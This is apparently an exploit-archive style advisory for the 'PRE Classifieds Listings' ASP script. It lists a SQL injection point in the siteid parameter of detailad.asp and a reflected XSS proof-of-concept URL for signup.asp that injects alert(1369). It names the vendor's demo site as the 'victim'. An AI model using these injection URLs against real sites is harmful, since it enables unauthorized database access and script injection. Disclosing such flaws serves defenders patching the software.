######################################################### --------------------------------------------------------- Portal Name: PRE Classifieds Listings Vendor : http://www.preproject.com/ Author : Pouya_Server , Pouya.s3rver@Gmail.com Vulnerability : (SQL,XSS) --------------------------------------------------------- ######################################################### [SQL]: http://site.com/[Path]/home/detailad.asp?siteid=[SQL] [XSS]: http://site.com/[Path]/home/signup.asp?full_name=pouya.s3rver@gmail.com&email=111-222-1933email@address.tst&pass=111-222-1933email@address.tst&address=alert(1369)%3B&phone=111-222-1933email@address.com&state=0&hide_email=on&url_add=111-222-1933email@address.tst&Submit=SignUp&addit=start --------------------------------- Victem : http://preproject.com/pclasp/